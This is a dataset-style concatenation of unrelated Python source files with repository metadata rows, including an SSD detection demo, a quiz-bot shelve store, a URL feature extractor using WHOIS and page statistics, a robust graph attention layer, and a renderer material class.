def run_demo(cfg, weights_file, iou_threshold, score_threshold, images_dir, output_dir, dataset_type):
if dataset_type == "voc":
class_names = VOCDataset.class_names
elif dataset_type == 'coco':
class_names = COCODataset.class_names
else:
raise NotImplementedError('Not implemented now.')
device = torch.device(cfg.MODEL.DEVICE)
model = build_ssd_model(cfg)
model.load(weights_file)
print('Loaded weights from {}.'.format(weights_file))
model = model.to(device)
predictor = Predictor(cfg=cfg,
model=model,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
device=device)
cpu_device = torch.device("cpu")
image_paths = glob.glob(os.path.join(images_dir, '*.jpg'))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
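    # For every image: run the predictor, move the outputs to CPU, draw the
    # predicted boxes/labels/scores and save the annotated copy to output_dir.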
for image_path in tqdm(image_paths):
image = Image.open(image_path).convert("RGB")
image = np.array(image)
output = predictor.predict(image)
boxes, labels, scores = [o.to(cpu_device).numpy() for o in output]
drawn_image = draw_bounding_boxes(image, boxes, labels, scores, class_names).astype(np.uint8)
image_name = os.path.basename(image_path)
Image.fromarray(drawn_image).save(os.path.join(output_dir, image_name))
def main():
parser = argparse.ArgumentParser(description="SSD Demo.")
parser.add_argument(
"--config-file",
default="configs/ssd300_voc0712.yaml",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument("--weights", default='weights/ssd300_voc0712_mAP77.83.pth',type=str, help="Trained weights.")
parser.add_argument("--iou_threshold", type=float, default=0.5)
parser.add_argument("--score_threshold", type=float, default=0.5)
parser.add_argument("--images_dir", default='demo', type=str, help='Specify a image dir to do prediction.')
parser.add_argument("--output_dir", default='demo/result', type=str, help='Specify a image dir to save predicted images.')
parser.add_argument("--dataset_type", default="voc", type=str, help='Specify dataset type. Currently support voc and coco.')
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
print(args)
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
print("Loaded configuration file {}".format(args.config_file))
#with open(args.config_file, "r") as cf:
# config_str = "\n" + cf.read()
# print(config_str)
#print("Running with config:\n{}".format(cfg))
run_demo(cfg=cfg,
weights_file=args.weights,
iou_threshold=args.iou_threshold,
score_threshold=args.score_threshold,
images_dir=args.images_dir,
output_dir=args.output_dir,
dataset_type=args.dataset_type)
if __name__ == '__main__':
main()
| 35.540816 | 128 | 0.669251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.20155 |
732dd28306f669f7a332fd1f3c061993b13d2ff5 | 800 | py | Python | quiz/bot/storage/shelter.py | shubham-king/guess-the-melody | 1658a17f41b39cfd212175a03e043b3be7bc0e56 | [
"MIT"
]
| 4 | 2019-06-15T15:32:43.000Z | 2020-02-21T09:45:36.000Z | quiz/bot/storage/shelter.py | shubham-king/guess-the-melody | 1658a17f41b39cfd212175a03e043b3be7bc0e56 | [
"MIT"
]
| 4 | 2020-07-05T07:20:26.000Z | 2021-04-25T21:05:53.000Z | quiz/bot/storage/shelter.py | shubham-king/guess-the-melody | 1658a17f41b39cfd212175a03e043b3be7bc0e56 | [
"MIT"
]
| 7 | 2020-06-13T20:11:41.000Z | 2021-11-09T07:47:02.000Z | from shelve import DbfilenameShelf, open
from typing import Type
from quiz.config import Config
from quiz.types import ContextManager, DictAccess
class Shelter(ContextManager, DictAccess):
"""Interface for bot shelter."""
def __init__(self, config: Type[Config]) -> None:
self._shelter: DbfilenameShelf = open(config.shelve_name)
def __enter__(self) -> "Shelter":
return self
def __getitem__(self, item: str) -> int:
return self._shelter[item]
def __setitem__(self, key: str, value: int) -> None:
self._shelter[key] = value
def __delitem__(self, key: str) -> None:
del self._shelter[key]
def close(self) -> None:
self._shelter.close()
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.close()
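# Illustrative usage (keys/values are only an example, not part of the quiz config):
#     with Shelter(Config) as shelter:
#         shelter["user:42"] = 3
#         print(shelter["user:42"])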
| 26.666667 | 65 | 0.665 | 651 | 0.81375 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.05125 |
73321c0acbdf4ab01ceed6d568aada4c5a634a97 | 125 | py | Python | src/applications/task310/apps.py | SergeyNazarovSam/SergeyPythonfirst | fd2bddf1f5ba28c6802be921177917f369f7ef2e | [
"MIT"
]
| 2 | 2020-12-17T20:19:21.000Z | 2020-12-22T12:46:43.000Z | src/applications/task310/apps.py | alexander-sidorov/tms-z43 | 61ecd204f5de4e97ff0300f6ef91c36c2bcda31c | [
"MIT"
]
| 4 | 2021-04-20T08:40:30.000Z | 2022-02-10T07:50:30.000Z | src/applications/task310/apps.py | SergeyNazarovSam/SergeyPythonfirst | fd2bddf1f5ba28c6802be921177917f369f7ef2e | [
"MIT"
]
| 1 | 2021-02-10T06:42:19.000Z | 2021-02-10T06:42:19.000Z | from django.apps import AppConfig
class Task310Config(AppConfig):
label = "task310"
name = f"applications.{label}"
| 17.857143 | 34 | 0.72 | 88 | 0.704 | 0 | 0 | 0 | 0 | 0 | 0 | 32 | 0.256 |
7332ce4b3b7c7b972d457f074400634cb61ce765 | 5,686 | py | Python | scripts/data_creation_v3.py | deepchecks/url_classification_dl | 029fddb78e019cf288adcc2fd46be3435536d469 | [
"CC0-1.0"
]
| 3 | 2021-05-22T09:20:54.000Z | 2022-03-14T15:58:17.000Z | scripts/data_creation_v3.py | deepchecks/url_classification_dl | 029fddb78e019cf288adcc2fd46be3435536d469 | [
"CC0-1.0"
]
| 1 | 2021-11-15T11:22:48.000Z | 2021-12-11T13:32:19.000Z | scripts/data_creation_v3.py | deepchecks/url_classification_dl | 029fddb78e019cf288adcc2fd46be3435536d469 | [
"CC0-1.0"
]
| 6 | 2021-05-15T17:46:22.000Z | 2022-03-24T11:24:59.000Z | import whois
from datetime import datetime, timezone
import math
import pandas as pd
import numpy as np
from pyquery import PyQuery
from requests import get
class UrlFeaturizer(object):
def __init__(self, url):
self.url = url
self.domain = url.split('//')[-1].split('/')[0]
self.today = datetime.now().replace(tzinfo=None)
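        # WHOIS lookups and HTTP requests may fail (unreachable domains, timeouts);
        # fall back to None so the feature methods return neutral defaults instead
        # of raising.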
try:
self.whois = whois.query(self.domain).__dict__
except:
self.whois = None
try:
self.response = get(self.url)
self.pq = PyQuery(self.response.text)
except:
self.response = None
self.pq = None
## URL string Features
def entropy(self):
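        # Entropy of the character distribution of the URL string; note the
        # returned value is sum(p * log2(p)), i.e. the negative of the usual
        # Shannon entropy.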
string = self.url.strip()
prob = [float(string.count(c)) / len(string) for c in dict.fromkeys(list(string))]
entropy = sum([(p * math.log(p) / math.log(2.0)) for p in prob])
return entropy
def ip(self):
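        # Return 1 if the URL looks like a bare dotted-quad IPv4 address
        # (four dot-separated numbers in 0-255), else 0.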
string = self.url
flag = False
if ("." in string):
elements_array = string.strip().split(".")
if(len(elements_array) == 4):
for i in elements_array:
if (i.isnumeric() and int(i)>=0 and int(i)<=255):
flag=True
else:
flag=False
break
if flag:
return 1
else:
return 0
def numDigits(self):
digits = [i for i in self.url if i.isdigit()]
return len(digits)
def urlLength(self):
return len(self.url)
def numParameters(self):
params = self.url.split('&')
return len(params) - 1
def numFragments(self):
fragments = self.url.split('#')
return len(fragments) - 1
def numSubDomains(self):
subdomains = self.url.split('http')[-1].split('//')[-1].split('/')
return len(subdomains)-1
def domainExtension(self):
ext = self.url.split('.')[-1].split('/')[0]
return ext
## URL domain features
def hasHttp(self):
return 'http:' in self.url
def hasHttps(self):
return 'https:' in self.url
def daysSinceRegistration(self):
if self.whois and self.whois['creation_date']:
diff = self.today - self.whois['creation_date'].replace(tzinfo=None)
diff = str(diff).split(' days')[0]
return diff
else:
return 0
def daysSinceExpiration(self):
if self.whois and self.whois['expiration_date']:
diff = self.whois['expiration_date'].replace(tzinfo=None) - self.today
diff = str(diff).split(' days')[0]
return diff
else:
return 0
## URL Page Features
def bodyLength(self):
if self.pq is not None:
            return len(self.pq('html').text()) if self.urlIsLive() else 0
else:
return 0
def numTitles(self):
if self.pq is not None:
titles = ['h{}'.format(i) for i in range(7)]
titles = [self.pq(i).items() for i in titles]
return len([item for s in titles for item in s])
else:
return 0
def numImages(self):
if self.pq is not None:
return len([i for i in self.pq('img').items()])
else:
return 0
def numLinks(self):
if self.pq is not None:
return len([i for i in self.pq('a').items()])
else:
return 0
def scriptLength(self):
if self.pq is not None:
return len(self.pq('script').text())
else:
return 0
def specialCharacters(self):
if self.pq is not None:
bodyText = self.pq('html').text()
schars = [i for i in bodyText if not i.isdigit() and not i.isalpha()]
return len(schars)
else:
return 0
def scriptToSpecialCharsRatio(self):
v = self.specialCharacters()
if self.pq is not None and v!=0:
sscr = self.scriptLength()/v
else:
sscr = 0
return sscr
def scriptTobodyRatio(self):
v = self.bodyLength()
if self.pq is not None and v!=0:
sbr = self.scriptLength()/v
else:
sbr = 0
return sbr
def bodyToSpecialCharRatio(self):
v = self.bodyLength()
if self.pq is not None and v!=0:
bscr = self.specialCharacters()/v
else:
bscr = 0
return bscr
def urlIsLive(self):
        return self.response is not None and self.response.status_code == 200
def run(self):
data = {}
data['entropy'] = self.entropy()
data['numDigits'] = self.numDigits()
data['urlLength'] = self.urlLength()
data['numParams'] = self.numParameters()
data['hasHttp'] = self.hasHttp()
data['hasHttps'] = self.hasHttps()
data['urlIsLive'] = self.urlIsLive()
data['bodyLength'] = self.bodyLength()
data['numTitles'] = self.numTitles()
data['numImages'] = self.numImages()
data['numLinks'] = self.numLinks()
data['scriptLength'] = self.scriptLength()
data['specialChars'] = self.specialCharacters()
data['ext'] = self.domainExtension()
data['dsr'] = self.daysSinceRegistration()
data['dse'] = self.daysSinceExpiration()
data['sscr'] = self.scriptToSpecialCharsRatio()
data['sbr'] = self.scriptTobodyRatio()
data['bscr'] = self.bodyToSpecialCharRatio()
data['num_%20'] = self.url.count("%20")
data['num_@'] = self.url.count("@")
data['has_ip'] = self.ip()
return data
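# Illustrative usage (requires network access; values depend on the live page):
#     features = UrlFeaturizer("https://example.com").run()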
| 29.769634 | 90 | 0.536933 | 5,527 | 0.972037 | 0 | 0 | 0 | 0 | 0 | 0 | 436 | 0.07668 |
7333549135a1f86b79763216b9dd3553195359bb | 5,175 | py | Python | rgnn_at_scale/models/gat.py | sigeisler/robustness_of_gnns_at_scale | 0f4844711ace599f54c2abc760b53680a80d6a32 | [
"MIT"
]
| 11 | 2021-11-01T19:54:41.000Z | 2022-01-27T11:34:11.000Z | rgnn_at_scale/models/gat.py | sigeisler/robustness_of_gnns_at_scale | 0f4844711ace599f54c2abc760b53680a80d6a32 | [
"MIT"
]
| 1 | 2021-12-13T21:14:56.000Z | 2022-01-16T17:37:36.000Z | rgnn_at_scale/models/gat.py | sigeisler/robustness_of_gnns_at_scale | 0f4844711ace599f54c2abc760b53680a80d6a32 | [
"MIT"
]
| 2 | 2021-11-05T00:42:18.000Z | 2022-01-12T10:10:30.000Z | from typing import Any, Dict, Tuple
import torch
from torch_geometric.nn import GATConv
from torch_sparse import SparseTensor, set_diag
from rgnn_at_scale.aggregation import ROBUST_MEANS
from rgnn_at_scale.models.gcn import GCN
class RGATConv(GATConv):
"""Extension of Pytorch Geometric's `GCNConv` to execute a robust aggregation function:
- soft_k_medoid
- soft_medoid (not scalable)
- k_medoid
- medoid (not scalable)
- dimmedian
Parameters
----------
mean : str, optional
The desired mean (see above for the options), by default 'soft_k_medoid'
mean_kwargs : Dict[str, Any], optional
Arguments for the mean, by default dict(k=64, temperature=1.0, with_weight_correction=True)
"""
def __init__(self, mean='soft_k_medoid',
mean_kwargs: Dict[str, Any] = dict(k=64, temperature=1.0, with_weight_correction=True),
**kwargs):
kwargs['in_channels'] = 2 * [kwargs['in_channels']]
super().__init__(**kwargs)
self._mean = ROBUST_MEANS[mean] if mean is not None else None
self._mean_kwargs = mean_kwargs
def forward(self, arguments: Tuple[torch.Tensor, SparseTensor] = None) -> torch.Tensor:
"""Predictions based on the input.
Parameters
----------
arguments : Sequence[torch.Tensor]
[x, edge indices] or [x, edge indices, edge weights], by default None
Returns
-------
torch.Tensor
the output of `GCNConv`.
Raises
------
NotImplementedError
if the arguments are not of length 2 or 3
"""
if len(arguments) == 2:
x, edge_index = arguments
edge_weight = None
elif len(arguments) == 3:
x, edge_index, edge_weight = arguments
else:
raise NotImplementedError("This method is just implemented for two or three arguments")
assert isinstance(edge_index, SparseTensor), 'GAT requires a SparseTensor as input'
assert edge_weight is None, 'The weights must be passed via a SparseTensor'
H, C = self.heads, self.out_channels
assert x.dim() == 2, 'Static graphs not supported in `GATConv`.'
x_l = x_r = self.lin_l(x).view(-1, H, C)
alpha_l = (x_l * self.att_l).sum(dim=-1)
alpha_r = (x_r * self.att_r).sum(dim=-1)
if self.add_self_loops:
edge_index = set_diag(edge_index)
# propagate_type: (x: OptPairTensor, alpha: OptPairTensor)
out = self.propagate(edge_index, x=(x_l, x_r),
alpha=(alpha_l, alpha_r))
alpha = self._alpha * edge_index.storage.value()[:, None]
self._alpha = None
if self.concat:
out = out.view(-1, self.heads * self.out_channels)
else:
out = out.mean(dim=1)
if self.bias is not None:
out += self.bias
attention_matrix = edge_index.set_value(alpha, layout='coo')
attention_matrix.storage._value = attention_matrix.storage._value.squeeze()
x = self.lin_l(x)
if self._mean is not None:
x = self._mean(attention_matrix, x, **self._mean_kwargs)
else:
x = attention_matrix @ x
x += self.bias
return x
class RGAT(GCN):
"""Generic Reliable Graph Neural Network (RGNN) implementation which currently supports a GCN architecture with the
aggregation functions:
- soft_k_medoid
- soft_medoid (not scalable)
- k_medoid
- medoid (not scalable)
- dimmedian
and with the adjacency preprocessings:
- SVD: Negin Entezari, Saba A. Al-Sayouri, Amirali Darvishzadeh, and Evangelos E. Papalexakis. All you need is Low
(rank): Defending against adversarial attacks on graphs.
- GDC: Johannes Klicpera, Stefan Weißenberger, and Stephan Günnemann. Diffusion Improves Graph Learning.
- Jaccard: Huijun Wu, Chen Wang, Yuriy Tyshetskiy, Andrew Docherty, Kai Lu, and Liming Zhu. Adversarial examples
for graph data: Deep insights into attack and defense.
Parameters
----------
mean : str, optional
The desired mean (see above for the options), by default 'soft_k_medoid'
mean_kwargs : Dict[str, Any], optional
Arguments for the mean, by default dict(k=64, temperature=1.0, with_weight_correction=True)
"""
def __init__(self,
mean: str = 'soft_k_medoid',
mean_kwargs: Dict[str, Any] = dict(k=64, temperature=1.0, with_weight_correction=True),
**kwargs):
self._mean_kwargs = dict(mean_kwargs)
self._mean = mean
super().__init__(**kwargs)
assert not self.do_checkpoint, 'Checkpointing is not supported'
def _build_conv_layer(self, in_channels: int, out_channels: int):
return RGATConv(mean=self._mean, mean_kwargs=self._mean_kwargs,
in_channels=in_channels, out_channels=out_channels)
def _cache_if_option_is_set(self, callback, x, edge_idx, edge_weight):
return SparseTensor.from_edge_index(edge_idx, edge_weight, (x.shape[0], x.shape[0])), None
| 36.443662 | 119 | 0.636329 | 4,940 | 0.954221 | 0 | 0 | 0 | 0 | 0 | 0 | 2,295 | 0.443307 |
7334d673ab4fa7b6545531cff68878e44e4b4835 | 902 | py | Python | code/renderer/randomize/material.py | jonathangranskog/shading-scene-representations | 9c9033a1ca05095c7e2ccfeb4da3046b687bef3d | [
"MIT"
]
| 21 | 2020-09-28T10:38:04.000Z | 2022-03-12T08:46:09.000Z | code/renderer/randomize/material.py | jonathangranskog/shading-scene-representations | 9c9033a1ca05095c7e2ccfeb4da3046b687bef3d | [
"MIT"
]
| null | null | null | code/renderer/randomize/material.py | jonathangranskog/shading-scene-representations | 9c9033a1ca05095c7e2ccfeb4da3046b687bef3d | [
"MIT"
]
| 1 | 2020-12-16T14:56:21.000Z | 2020-12-16T14:56:21.000Z | import numpy as np
import pyrr
import os
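# Simple container for per-surface material parameters (color, emission,
# roughness, IOR, optional texture path) that can serialize itself to a plain
# dict via as_dict().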
class Material():
def __init__(self, color=np.ones(3, dtype=np.float32), emission=np.zeros(3, dtype=np.float32), roughness=1.0, ior=15.0, id=0, texture=None, texture_frequency=np.array([1.0, 1.0])):
self.color = color
self.emission = emission
self.roughness = roughness
self.ior = ior
        if texture is not None:
self.texture = os.path.abspath(texture)
else:
self.texture = ""
self.texture_frequency = texture_frequency
self.id = id
def as_dict(self):
d = {}
d["color"] = self.color.tolist()
d["emission"] = self.emission.tolist()
d["roughness"] = self.roughness
d["ior"] = self.ior
d["texture"] = self.texture
d["texture_frequency"] = self.texture_frequency.tolist()
d["id"] = self.id
return d | 32.214286 | 184 | 0.586475 | 860 | 0.953437 | 0 | 0 | 0 | 0 | 0 | 0 | 67 | 0.074279 |